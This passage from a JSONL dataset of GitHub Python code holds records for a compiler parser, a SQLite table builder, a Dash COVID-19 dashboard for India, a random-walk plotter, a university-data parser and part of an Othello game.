None\n\n def term(self):\n \"\"\"\n ::= \n \"\"\"\n var_type_a, expr = self.factor()\n var_type_b, expr2 = self.derived_term(var_type_a, expr)\n\n \n if expr2 is not None:\n expr = expr2\n \n return var_type_a, expr\n\n def derived_term(self, var_type_a, expr, flag=False):\n \"\"\"\n ::= * | / | null\n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['*'] or self.token[0] == token_table['/']):\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n expr = expr + ' ' + self.token[1]\n var_type_b, expr2 = self.factor()\n\n if expr2 is not None and flag is False:\n expr = expr + ' ' + expr2\n\n if any([op in expr for op in ['*', '/', '+', '-']]):\n self.write_code('t'+str(self.aux) + ' = ' + expr, ';\\n')\n expr = 't'+str(self.aux)\n self.aux = self.aux + 1\n\n else:\n expr = expr + ' ' + expr2\n\n if var_type_a != var_type_b and var_type_a is not None and var_type_b is not None:\n self.scanner.error('Operação aritmética com tipos diferentes')\n\n _, expr3 = self.derived_term(var_type_a, expr, flag=True)\n\n if expr3 is not None:\n expr = expr3\n return var_type_a, expr\n else:\n return None, None\n\n def factor(self):\n \"\"\"\n ::= ( ) | | | \n \"\"\"\n self.token = self.scanner.get_token()\n if (self.token[0] == token_table['id']):\n return self.context[self.token[1]], self.token[1]\n elif self.token[0] == token_table['int_value']:\n return 'int', self.token[1]\n elif self.token[0] == token_table['float_value']:\n return 'float', self.token[1]\n elif self.token[0] == token_table['char_value']:\n return 'char', self.token[1]\n elif(self.token[0] == token_table['(']):\n \n var_type_a, expr = self.arithmetic_expression()\n\n if (self.token[0] != token_table[')']):\n self.scanner.error('Parênteses desbalanceados.')\n \n return var_type_a, expr\n else:\n self.scanner.error('Esperado uma expressão aritmética, variável, valor inteiro, float ou char')\n\n def type(self):\n \"\"\"\n ::= int | float | char\n \"\"\"\n return self.token[0] == token_table['int'] or self.token[0] == token_table['float'] or self.token[0] == token_table['char']\n\n def write_code(self, token, space=' '):\n self.code.write(token + space)\n\n def close_code(self):\n self.code.close()","repo_name":"filipecmedeiros/compiler","sub_path":"src/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":12411,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32823989221","text":"#!/usr/bin/env python\n\n# Create the simple tables requested and run the necessary queries.\n#\n# I will actually create the tables in two different ways - one using\n# the standard python approach we have seen before, and one using Pandas.\n#\n\n# I import the print function here so that the code works\n# with both python2 and python3\nfrom __future__ import print_function\nimport sqlite3 as lite\nfrom astropy.table import Table\nimport pandas as pd\n\ndef is_number(s):\n # I need a function like this below to decide whether\n # to insert apostrophes around the arguments in SQL.\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n#\n# Standard Python creation\n#\n\n# I will simplify the creation a bit - for readability I define the schemas here\nMagSchema = \"\"\"CREATE TABLE IF NOT EXISTS MagTable (Name varchar(6),\n Ra varchar(12),\n Decl varchar(12),\n B Float,\n R Float,\n UNIQUE(Name));\n\"\"\"\n# Note that I 
decided to modify the table somewhat - that is ok, and\n# split off the unit as a separate quantity.\nPhysSchema = \"\"\"\nCREATE TABLE IF NOT EXISTS PhysTable (Name varchar(6),\n Teff Float,\n Unit varchar(1),\n FeH Float,\n UNIQUE(Name));\n\"\"\"\n\n\n# I now define my tables through a dict. Each element in the dict\n# contains the name of the file to read the data from and the\n# schema that we want to use.\ntables = {'MagTable': ['MagTable.csv', MagSchema],\n 'PhysTable': ['PhysTable.csv', PhysSchema]}\n\ncon = lite.connect('SimpleTables-default.db')\nwith con:\n for name in tables.keys():\n file_name, schema = tables[name]\n print(\"I will read from {0}\".format(file_name))\n t = Table().read(file_name, format='csv')\n\n con.execute(schema)\n for row in t:\n command = \"INSERT INTO {0} VALUES(\".format(name)\n n_columns = len(row)\n for i, col in enumerate(row):\n # Now the trick here is how to handle strings. Numbers do\n # not need to be enclosed in apostrophes so I'll just do\n # the simple check\n if is_number(col):\n arg = str(col)\n else:\n arg = \"'\"+str(col)+\"'\"\n \n command = command+arg\n if i < n_columns-1:\n command = command+','\n\n command = command+')'\n \n try:\n print(\"Command = {0}\".format(command))\n con.execute(command)\n except:\n pass\n \n\n\n#\n# Create the tables using Pandas.\n#\n# To do this, we first need to create Pandas data frame. Luckily this is\n# very easy from astropy tables\n#\nMagTable = Table().read('MagTable.csv', format='csv')\nPhysTable = Table().read('PhysTable.csv', format='csv')\n\n# Conversion to Pandas data frames.\ndf_MagTable = MagTable.to_pandas()\ndf_PhysTable = PhysTable.to_pandas()\n\n# Finally, create the connection\ncon = lite.connect('SimpleTables-pandas.db')\n\n# And create the tables.\ndf_MagTable.to_sql(\"MagTable\", con, if_exists='replace')\ndf_PhysTable.to_sql(\"PhysTable\", con, if_exists='replace')\n","repo_name":"jbrinchmann/MLD2019","sub_path":"ProblemSets/1 - SQL and Databases/Solution/make_simple_tables.py","file_name":"make_simple_tables.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"16469695852","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash import Dash\r\nfrom dash.dependencies import Input, Output\r\nfrom io import StringIO\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport plotly.offline as pyo\r\nimport os\r\nfrom requests import request\r\nimport urllib.request\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n\r\n\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\r\n\r\nurl = 'https://www.mohfw.gov.in/'\r\n# make a GET request to fetch the raw HTML content\r\nweb_content = requests.get(url).content\r\n# parse the html content\r\nsoup = BeautifulSoup(web_content, \"html.parser\")\r\n# remove any newlines and extra spaces from left and right\r\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row]\r\n# find all table rows and data cells within\r\nstats = []\r\nall_rows = soup.find_all('tr')\r\nfor row in all_rows:\r\n stat = extract_contents(row.find_all('td'))\r\n# notice that the data that we require is now a list of length 5\r\n if len(stat) == 5:\r\n stats.append(stat)\r\n#now convert the data into a pandas dataframe 
for further processing\r\nnew_cols = [\"Sr.No\", \"States/UT\",\"Confirmed\",\"Recovered\",\"Deceased\"]\r\nstate_data = pd.DataFrame(data = stats, columns = new_cols)\r\n\r\npop = pd.read_csv('population_india_census2011.csv')\r\npop.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\np = pd.read_csv('population_india_census2011.csv')\r\np.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\nlist_ = state_data['States/UT'].unique()\r\ndf = p[p['States/UT'].isin(['list_']) == False]\r\nstate_data = pd.merge(state_data,df,on = 'States/UT')\r\nstate_data['Mortality rate'] = (state_data['Deceased'].map(int)/state_data['Population'].map(int))*100\r\n\r\nurl=\"https://datahub.io/core/covid-19/r/countries-aggregated.csv\"\r\ns=requests.get(url, headers= headers).text\r\n\r\ndf_con=pd.read_csv(StringIO(s)) ## per country cases per day\r\n\r\nurl=\"https://datahub.io/core/covid-19/r/worldwide-aggregated.csv\"\r\n\r\ns=requests.get(url, headers= headers).text\r\n\r\ndf_world=pd.read_csv(StringIO(s)) ## worldwide-cases per day\r\n\r\nd = pd.read_csv('AgeGroupDetails.csv')\r\nd['Percentage'] = (d['Percentage'].str.strip('%').astype(float))\r\n\r\nbeds = pd.read_csv('HospitalBedsIndia.csv')\r\nbeds['Total'] = beds['NumUrbanBeds_NHP18']+beds['NumRuralBeds_NHP18']+beds['NumPublicBeds_HMIS']\r\nbeds=beds.iloc[:36]\r\n\r\ntests = pd.read_csv(\"ICMRTestingLabs.csv\")\r\ncen = tests.groupby('state')['lab'].count().reset_index()\r\n\r\nurl=\"https://www.worldometers.info/coronavirus/\"\r\ns=requests.get(url, headers= headers).text\r\ndf5=pd.read_html(StringIO(s))\r\ntest5 = df5[0]['TotalTests']\r\ncountry5=df5[0]['Country,Other']\r\n\r\n\r\ndef read_from_api(URL):\r\n response = request(url=URL, method='get')\r\n x = URL.split('/').pop(-1)\r\n x = x[:-5]\r\n elevations = response.json()\r\n rec = elevations[x]\r\n return json_normalize(rec)\r\n\r\ndf_raw_data = read_from_api('https://api.covid19india.org/raw_data.json')\r\ngender = df_raw_data.groupby('detectedstate')['gender'].count()\r\ngdm = df_raw_data[df_raw_data['gender']=='M']\r\ngen1 = gdm.groupby('detectedstate')['gender'].count().reset_index()\r\n\r\ngdf = df_raw_data[df_raw_data['gender']=='F']\r\ngen2 = gdf.groupby('detectedstate')['gender'].count().reset_index()\r\n\r\npop = pd.read_csv('population_india_census2011.csv')\r\npop.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\ndf_raw_data.rename(columns={'detectedstate': 'States/UT'}, inplace = True)\r\n\r\ndf1 = pop[pop['States/UT'].isin(['list_']) == False]\r\n\r\ndf_raw_data = pd.merge(df_raw_data,df1,on = 'States/UT')\r\n\r\ntest = pd.read_csv('StatewiseTestingDetails.csv')\r\n\r\ngender = df_raw_data.groupby('States/UT')['gender'].count()\r\ngdm = df_raw_data[df_raw_data['gender']=='M']\r\ngen1 = gdm.groupby('States/UT')['gender'].count().reset_index()\r\n\r\ngdf = df_raw_data[df_raw_data['gender']=='F']\r\ngen2 = gdf.groupby('States/UT')['gender'].count().reset_index()\r\n\r\ngen1=pd.merge(gen1,df,on = 'States/UT')\r\ngen1['gp']=(gen1['gender'].map(int)/gen1['Population'].map(int))*100\r\n\r\ngen2=pd.merge(gen2,df,on = 'States/UT')\r\ngen2['gp']=(gen2['gender'].map(int)/gen2['Population'].map(int))*100\r\n\r\ni = test['Negative'].sum()\r\nj = test['Positive'].sum()\r\ntest_s = {'label':['Negative test','Positive test'],'number':[i,j]}\r\ndata_p=pd.DataFrame(test_s)\r\n\r\nt = {'Country,Other':country5,'number':test5}\r\np_=pd.DataFrame(t)\r\nac = p_[p_['Country,Other'] =='India']\r\n\r\n#counting world 
data\r\na=df_world.shape[0]\r\nConfirmed_world=df_world[['Date','Confirmed']].iloc[a-1].reset_index().iloc[1,1]\r\nRecovered_world=df_world[['Date','Recovered']].iloc[a-1].reset_index().iloc[1,1]\r\nDeaths_world=df_world[['Date','Deaths']].iloc[a-1].reset_index().iloc[1,1]\r\n\r\n#adding 2 columns\r\nstate_data['Fatality rate'] = (state_data['Deceased'].map(int)/state_data['Confirmed'].map(int))*100\r\nstate_data['Recovery rate'] = (state_data['Recovered'].map(int)/state_data['Confirmed'].map(int))*100\r\n\r\n# Plot Line Chart here\r\n\r\ntrace = go.Scatter(x=state_data['States/UT'], y=state_data['Confirmed'],\r\n mode='lines+markers',\r\n marker={'color': '#030808'}, name='Confirmed')\r\n\r\ntrace1 = go.Scatter(x=state_data['States/UT'], y=state_data['Deceased'],\r\n mode='lines+markers',marker={'color': '#DC143C'},name='Death')\r\n\r\ntrace2 = go.Scatter(x=state_data['States/UT'], y=state_data['Recovered'],\r\n mode='lines+markers', marker={'color': '#00a65a'}, name='Recovered')\r\n\r\ndata = [trace, trace1, trace2]\r\n\r\nlayout = go.Layout(title='Confirmed vs Death vs Recovered in India',\r\n xaxis={'title': '','automargin' : True},\r\n yaxis={'title': 'Numbers'})\r\n\r\nfig = go.Figure(data=data, layout=layout)\r\n\r\n\r\n#line chart\r\ntrace3=go.Scatter(x=df_world['Date'],y=df_world['Confirmed'],mode='lines+markers',name='Confirmed')\r\ntrace4=go.Scatter(x=df_world['Date'],y=df_world['Deaths'],mode='lines+markers',name='Deaths')\r\ntrace5=go.Scatter(x=df_world['Date'],y=df_world['Recovered'],mode='lines+markers',marker={'color':'#00a65a'},name='Recovered')\r\ndata1=[trace3,trace4,trace5]\r\nlayout1=go.Layout(title='Rise in Covid19 cases per day in the world',xaxis={'title':'Date'},yaxis={'title':'Total cases'})\r\nfig1=go.Figure(data=data1,layout=layout1)\r\n\r\n#piechart\r\ntrace6=go.Pie(labels=d['AgeGroup'],values=d['Percentage'],hole=.3,textposition='inside', textfont_size=14)\r\n\r\ndata2=[trace6]\r\n\r\nlayout2=go.Layout(title='Age probability to get affected by the virus')\r\n\r\nfig2=go.Figure(data=data2,layout=layout2)\r\n\r\n#stacked bar graph\r\ntrace7=go.Bar(x=gen1['States/UT'],y=gen1['gp'], name='Male',\r\n marker={'color':'#00a65a'})\r\n\r\ntrace8=go.Bar(x=gen2['States/UT'],y=gen2['gp'], name='Female',\r\n marker={'color':'#a6a65a'})\r\n\r\ndata3=[trace7,trace8]\r\n\r\nlayout3=go.Layout(title='Gender probability of getting affected in several states',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Gender Probability'})\r\n\r\nfig3=go.Figure(data=data3, layout=layout3)\r\n\r\n#bubble plot\r\ntrace9=go.Scatter(x=beds['State/UT'],y=beds['Total'],mode='markers',\r\n marker={'size':beds['Sno']})\r\n\r\ndata4=[trace9]\r\n\r\nlayout4=go.Layout(title='Hospital beds present in each state to fight Covid',\r\n xaxis={'title':''},\r\n yaxis={'title':'Total no. 
of beds'})\r\n\r\nfig4=go.Figure(data=data4,layout=layout4)\r\n\r\n#bar plot for labs\r\ntrace10 = go.Bar(x=cen['state'],y=cen['lab'])\r\ndata5=trace10\r\nlayout5 =go.Layout(title='Testing centres in different states',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Number','automargin': True})\r\nfig5 = go.Figure(data=data5,layout=layout5)\r\n\r\n#pie chart\r\ntrace11=go.Pie(labels=data_p['label'],values=data_p['number'],textposition='inside', textfont_size=14)\r\n\r\ndata6=[trace11]\r\n\r\nlayout6=go.Layout(title='Covid19 test results')\r\n\r\nfig6=go.Figure(data=data6,layout=layout6)\r\n\r\noptions1=[\r\n {'label':'Recovery rate', 'value':'Recovery rate'},\r\n {'label':'Fatality rate', 'value':'Fatality rate'},\r\n {'label':'Mortality rate', 'value':'Mortality rate'}\r\n\r\n]\r\n\r\n\r\noptions=[\r\n {'label':'Confirmed', 'value':'Confirmed'},\r\n {'label':'Recovered', 'value':'Recovered'},\r\n {'label':'Deaths', 'value':'Deaths'},\r\n {'label':'Total Tests for Covid19 done so far', 'value':'TotalTests'},\r\n\r\n]\r\n\r\nexternal_stylesheets = [\r\n {\r\n 'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\r\n 'rel': 'stylesheet',\r\n 'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\r\n 'crossorigin': 'anonymous',\r\n\r\n }\r\n]\r\n\r\n\r\napp1 = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\nserver=app1.server\r\napp1.layout=html.Div([\r\n html.H1(\"Covid19 India Tracker\",style={'color':'#fff','text-align':'center'}),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Confirmed cases in India\", className='text-light'),\r\n html.H4(state_data['Confirmed'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-danger m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Recovered cases in India\", className='text-light'),\r\n html.H4(state_data['Recovered'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-success m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Death cases in India\", className='text-light'),\r\n html.H4(state_data['Deceased'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-warning h-100 m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Active cases in India\", className='text-light'),\r\n html.H4((state_data['Confirmed'].map(int).sum()) - (state_data['Deceased'].map(int).sum()) - (\r\n state_data['Recovered'].map(int).sum()), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-info h-100 m-auto')\r\n ], className='col-md-3')\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(id='picker1',options=options ,value='Confirmed'),\r\n dcc.Graph(id='choropleth')\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n ],className = 'row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='line chart1',figure=fig1)\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n ],className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id = 'line chart',figure = fig)\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n 
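    # Layout convention used throughout this app: each figure lives in a
    # row > col-md-* > card > card-body Bootstrap hierarchy, with the
    # dcc.Graph (plus an optional dcc.Dropdown) as the innermost children.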
],className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(id='picker', options=options1, value='Recovery rate'),\r\n dcc.Graph(id='bar')\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Remember? Prevention is better than cure\",className='bold',style={'color': 'black', 'text-align': 'center'}),\r\n html.H4(\"Check out your probability of getting affected and stay safe\", style={'color': 'black', 'text-align': 'center'})\r\n ], className='card-body')\r\n ], className='card bg-warning')\r\n ], className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Pie1',figure=fig2)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-6'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bar',figure=fig3)\r\n ], className='card-body')\r\n ], className='card bg-dark ')\r\n ], className='col-md-6'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Total number of Covid19 tests taken place in India till date\", className='text-light',style={'text-align': 'center'}),\r\n html.H4(ac['number'].map(int), className='text-light',style={'text-align': 'center'})\r\n ], className='card-body')\r\n ], className='card bg-info')\r\n ], className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Pie chart',figure=fig6)\r\n ],className='card-body')\r\n ],className='card bg-dark ')\r\n ],className='col-md-6'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bar1',figure=fig5)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-6'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bubble',figure=fig4)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-12')\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"STAY HOME,STAY SAFE\", className='bold',style={'color': 'grey', 'text-align': 'center'}),\r\n html.H6('@TEAM-SHIVAJI', style={'color': 'grey', 'text-align': 'center'}),\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-12')\r\n ], className='row')\r\n\r\n],className = 'container')\r\n\r\n\r\n@app1.callback(Output('bar','figure'),[Input('picker','value')])\r\ndef update_graph(type):\r\n if type=='Recovery rate':\r\n return {'data':[go.Bar(x=state_data['States/UT'],y=state_data['Recovery rate'],marker_color='green')],\r\n 'layout':go.Layout(title='Recovery rate in India',\r\n xaxis={'title':'','automargin' : True},\r\n yaxis={'title':'Recovery rate'})}\r\n elif type=='Fatality rate':\r\n return {'data': [go.Bar(x=state_data['States/UT'],y=state_data['Fatality rate'],marker_color='crimson')],\r\n 'layout': go.Layout(title='Fatality rate in India',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Fatality rate'})}\r\n else:\r\n return {'data': [go.Bar(x=state_data['States/UT'], y=state_data['Mortality rate'], marker_color='indianred')],\r\n 'layout': go.Layout(title='Mortality rate in India',\r\n xaxis={'title': '', 'automargin': True},\r\n yaxis={'title': 'Mortality rate'})}\r\n\r\n\r\n\r\n@app1.callback(Output('choropleth', 'figure'), [Input('picker1', 'value')])\r\ndef 
update_graph(type):\r\n if type == 'Confirmed':\r\n dff = df_con.groupby('Country')['Confirmed'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff['Country'], z=dff['Confirmed'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(180,180,180)','width':0.5}},\r\n colorbar={'thickness':15,'len':1.,'x':0.9,'y':0.7,\r\n 'title':{'text':'Confirmed','side':'bottom'}})],\r\n 'layout': go.Layout(title='Confirmed cases all over the world, to see where exactly India stands')}\r\n elif type == 'Recovered':\r\n dff1 = df_con.groupby('Country')['Recovered'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff1['Country'], z=dff1['Recovered'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(255,255,255)','width':0.5}},\r\n colorbar={'thickness':15,'len':1,'x':0.9,'y':0.7,\r\n 'title':{'text':'Recovered','side':'bottom'}})],\r\n 'layout': go.Layout(title='Recovered cases all over the world, to see where exactly India stands')}\r\n elif type== 'Deaths' :\r\n dff2 = df_con.groupby('Country')['Deaths'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff2['Country'], z=dff2['Deaths'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(255,255,255)','width':0.5}},\r\n colorbar={'thickness':15,'len':1,'x':0.9,'y':0.7,\r\n 'title':{'text':'Deaths','side':'bottom'}})],\r\n 'layout': go.Layout(title='Death cases all over the world,to see where exactly India stands')}\r\n else:\r\n return {'data': [go.Choropleth(locations=country5, z=test5, autocolorscale=False,\r\n locationmode='country names', colorscale='rainbow',\r\n marker={'line': {'color': 'rgb(255,255,255)', 'width': 0.5}},\r\n colorbar={'thickness': 15, 'len': 1, 'x': 0.9, 'y': 0.7,\r\n 'title': {'text': 'Total Tests', 'side': 'bottom'}})],\r\n 'layout': go.Layout(title='Total Tests all over the world,to see where exactly India stands')}\r\n\r\n\r\nif __name__==\"__main__\":\r\n app1.run_server(debug=False)\r\n","repo_name":"incubateind/Hack-For-Good","sub_path":"Sharika Anjum Mondal/Team - Shivaji covid-19 dashboard/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":18810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33316493292","text":"from matplotlib import pyplot as plt\r\nfrom probabilityFunctions import *\r\n\r\ndef simpleRandomWalk(k,plot=\"True\"): #This function is a simple random walk with equally probable outcomes \r\n n_values = []\r\n while k !=0:\r\n n_values.append(int(input(\"Please enter step a value (n): \")))\r\n k -= 1 \r\n n_values = tuple(n_values)\r\n for i in n_values:\r\n num = n_values.index(i)\r\n probPlot(probability(i,0.5),num,i)\r\n if plot == \"True\":\r\n plt.show()\r\n else: \r\n pass \r\n\r\ndef biasedRandomWalk(n,first,second, plot=\"True\"): # Biased random walk with variable likelihood of Success or Failure \r\n data0 = probability(n,0.5) # Equally probable outcomes\r\n data1 = probability(n,first) # Variable likelihood of success 1 \r\n data2 = probability(n,second) # Variable liklihood of success 2\r\n plotThreeProbs(data0 ,data1,data2,first,second,n)\r\n plt.show()\r\n 
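# The probability(), probPlot() and plotThreeProbs() helpers are imported
# from probabilityFunctions, which is not shown in this record. A minimal
# sketch of what probability(n, p) plausibly returns -- the binomial PMF
# P(X = k) = C(n, k) * p**k * (1 - p)**(n - k) for k = 0..n -- under that
# assumption (kept commented out so it does not shadow the real import):
#
#     from math import comb
#
#     def probability(n, p):
#         return [comb(n, k) * p**k * (1 - p)**(n - k) for k in range(n + 1)]
#
# simpleRandomWalk() plots this PMF with p = 0.5 (a fair walk), while
# biasedRandomWalk() overlays the p = 0.5 curve with the two biased ones.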
\r\n#simpleRandomWalk(4,plot=\"False\")\r\nbiasedRandomWalk(100,0.6,0.4)\r\n","repo_name":"ConorBoyle461/Analytics","sub_path":"scripts/python/fyp/binomialProbability.py","file_name":"binomialProbability.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15724043936","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom .handlers.independents.announces import announces\nfrom .handlers.independents.contests import contests\nfrom .handlers.independents.educationalPublications import educationalPublications\nfrom .handlers.independents.timetable.getAllGroups import getAllGroups\nfrom .handlers.independents.timetable.getGroupTimetable import getGroupTimetable\n\n\n# infoType - the type of information to parse\n# query - the query string, if one is used (optional)\n\n# Types:\n# - announces - announcements\n# - contests - contests\n# - educationalPublications - educational publications (query required)\n# - timetable.getAllGroups - get all groups for a given study form and course\n# - timetable.getGroupTimetable - get all classes of a group by group name and study form\n\ndef parser(infoType, query='', lang='ru-RU'):\n    types = {\n        # 'url': 'https://news.itmo.ru/ru/events/', \n        \n        'announces': {'handler': announces},\n        'contests': {'handler': contests},\n        'educationalPublications': {'handler': educationalPublications},\n        'timetable.getAllGroups': {'handler': getAllGroups},\n        'timetable.getGroupTimetable': {'handler': getGroupTimetable}\n    }\n\n    if infoType not in types:\n        raise TypeError('Unknown type')\n\n    if 'url' not in types[infoType]:\n        return types[infoType]['handler'](query, lang)\n\n    try:\n        r = requests.get(types[infoType]['url'])\n    except requests.exceptions.RequestException:\n        return False\n\n    soup = bs(r.text, \"html.parser\")\n\n    return types[infoType]['handler'](soup)\n","repo_name":"coder-medved/YandexSkill_ITMO","sub_path":"src/backend/utils/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12052939128","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport math\nfrom typing import List\n\nimport pygame\n\nimport logic\nimport utils\nimport server_2 as server\nimport client_2 as client\nfrom framework import Widget, Label, ReverseColorButton\nfrom constants import *\n\n\nclass ChessPiece(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.center = kwargs.get('center', self.center)\n self.color = kwargs.get('color', THECOLORS['black'])\n self.border_width = kwargs.get('border_width', 2.5)\n self.border_color = kwargs.get('border_color', THECOLORS['black'])\n self.callback = kwargs.get('callback', None)\n\n if self.width != self.height:\n raise ValueError('width != height for chess piece')\n\n @property\n def radius(self):\n return self.width / 2\n\n def collide_point(self, x, y):\n center = self.center\n return math.hypot(x - center[0], y - center[1]) <= self.radius\n\n def on_mouse_down(self, pos, button):\n if self.collide_point(*pos):\n if self.disabled:\n return True\n if self.callback is not None:\n if self.callback(pos, button):\n return True\n\n def _draw(self, win: pygame.Surface, dt: int):\n pygame.draw.circle(win, self.border_color, self.center, self.radius)\n pygame.draw.circle(win, self.color, self.center, self.radius - self.border_width)\n\n\nclass OthelloWorld(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.game = kwargs['game'] # type: Game\n\n self._setup_ui()\n\n def _setup_ui(self):\n # Create sprites.\n _piece_radius = (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) / CONF.G.BOARD_WIDTH / 2 - 5.0\n\n def _piece_pos(i, j):\n return (CONF.U.BOARD_EDGES['left'] + (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) /\n CONF.G.BOARD_WIDTH * (j + 0.5),\n CONF.U.BOARD_EDGES['top'] + (CONF.U.BOARD_EDGES['bottom'] - CONF.U.BOARD_EDGES['top']) /\n CONF.G.BOARD_HEIGHT * (i + 0.5))\n\n def _callback_factory(i, j):\n def _callback(pos, button, i=i, j=j):\n if self.game.status != 'running':\n return False\n self.game.take_action({\n 'type': 'play',\n 'i': i, 'j': j,\n 'player_id': self.game.state.current_player_id,\n })\n return True\n return _callback\n\n self.board_pieces = [[ # type: List[List[ChessPiece]]\n self.add_child(ChessPiece(\n center=_piece_pos(i, j),\n width=2 * _piece_radius, height=2 * _piece_radius,\n color=THECOLORS['white'],\n visible=False, callback=_callback_factory(i, j),\n ))\n for j in range(CONF.G.BOARD_WIDTH)\n ] for i in range(CONF.G.BOARD_HEIGHT)]\n\n self.player_labels = {\n 0: self.add_child(Label(\n text='玩家0',\n color=THECOLORS['red'],\n center=CONF.U.PLAYER_LABEL_POS[0],\n )),\n 1: self.add_child(Label(\n text='玩家1',\n color=THECOLORS['blue'],\n center=CONF.U.PLAYER_LABEL_POS[1],\n )),\n }\n self.player_status_labels = {\n 0: self.add_child(Label(\n text='胜', color=THECOLORS['black'],\n center=(CONF.U.CURR_PLAYER_LABEL_X, CONF.U.PLAYER_LABEL_POS[0][1]),\n visible=False,\n )),\n 1: self.add_child(Label(\n text='胜', color=THECOLORS['black'],\n center=(CONF.U.CURR_PLAYER_LABEL_X, CONF.U.PLAYER_LABEL_POS[1][1]),\n visible=False,\n )),\n }\n\n self.current_player_tag = self.add_child(ChessPiece(\n color=THECOLORS['black'],\n width=2 * _piece_radius, height=2 * _piece_radius,\n visible=False,\n ))\n self.current_player_tag.center_x = 